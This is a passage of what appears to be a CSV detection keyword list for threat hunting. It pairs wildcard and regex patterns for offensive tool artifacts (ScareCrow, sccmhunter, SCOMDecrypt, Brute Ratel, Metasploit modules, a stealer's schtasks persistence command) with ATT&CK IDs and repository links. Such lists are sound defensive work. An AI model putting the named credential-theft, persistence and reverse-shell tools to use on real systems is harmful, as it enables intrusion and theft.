- T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" 
"*ScareCrow/limelighter*",".{0,1000}ScareCrow\/limelighter.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow/Loader*",".{0,1000}ScareCrow\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow/Utils*",".{0,1000}ScareCrow\/Utils.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_*_darwin_amd64*",".{0,1000}ScareCrow_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed 
around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_*_linux_amd64*",".{0,1000}ScareCrow_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_*amd64*",".{0,1000}ScareCrow_.{0,1000}amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow_checksums.txt*",".{0,1000}ScareCrow_checksums\.txt.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*SCCM_DLLSiteloading.txt*",".{0,1000}SCCM_DLLSiteloading\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*sccmdecryptpoc.*",".{0,1000}sccmdecryptpoc\..{0,1000}","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential 
Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sccmhunter.db",".{0,1000}sccmhunter\.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*sccmhunter.git*",".{0,1000}sccmhunter\.git.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*sccmhunter.py*",".{0,1000}sccmhunter\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*sccmwtf.py*",".{0,1000}sccmwtf\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*scdivert localhost *",".{0,1000}scdivert\slocalhost\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and 
Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*scecli\0evilpwfilter*",".{0,1000}scecli\\0evilpwfilter.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","0","N/A","N/A","7","610","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" "*scheduledtask_utils.py *",".{0,1000}scheduledtask_utils\.py\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*ScheduleRunner.csproj*",".{0,1000}ScheduleRunner\.csproj.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" 
"*ScheduleRunner.exe*",".{0,1000}ScheduleRunner\.exe.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ScheduleRunner.sln*",".{0,1000}ScheduleRunner\.sln.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*schlamperei.x86.dll*",".{0,1000}schlamperei\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*schshell.cna*",".{0,1000}schshell\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*schtask_callback*",".{0,1000}schtask_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*SchTaskBackdoor.*",".{0,1000}SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*schtasks /create /tn ""CursorSvc""*",".{0,1000}schtasks\s\/create\s\/tn\s\""CursorSvc\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 
- TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*schtasks /create /tn *Constants.PERSISTENCE_WINDOWS_TASK +*",".{0,1000}schtasks\s\/create\s\/tn\s.{0,1000}Constants\.PERSISTENCE_WINDOWS_TASK\s\+.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*schtasks_elevator*",".{0,1000}schtasks_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*schtasks_exploit *",".{0,1000}schtasks_exploit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*schtasksabuse.rb*",".{0,1000}schtasksabuse\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SchTasksImplant*",".{0,1000}SchTasksImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*schtquery * full*",".{0,1000}schtquery\s.{0,1000}\sfull.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*SCNotification.exe.config.malicious*",".{0,1000}SCNotification\.exe\.config\.malicious.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*SCOMDecrypt.csproj*",".{0,1000}SCOMDecrypt\.csproj.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*SCOMDecrypt.exe*",".{0,1000}SCOMDecrypt\.exe.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*SCOMDecrypt.ps1*",".{0,1000}SCOMDecrypt\.ps1.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*screen_spy.rb*",".{0,1000}screen_spy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*screengrab.exe*",".{0,1000}screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*screenshot_inject *",".{0,1000}screenshot_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*screenspy.rb*",".{0,1000}screenspy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Screetsec*",".{0,1000}Screetsec.{0,1000}","offensive_tool_keyword","Github Username","github username hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*screetsec/Microsploit*",".{0,1000}screetsec\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*screetsec/Pateensy*",".{0,1000}screetsec\/Pateensy.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*screetsec/Sudomy*",".{0,1000}screetsec\/Sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*screetsec/Vegile*",".{0,1000}screetsec\/Vegile.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your specific process. unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a process which while run another process. So we can assume that this process is unstoppable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*--script broadcast-dhcp-discover*",".{0,1000}\-\-script\sbroadcast\-dhcp\-discover.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - 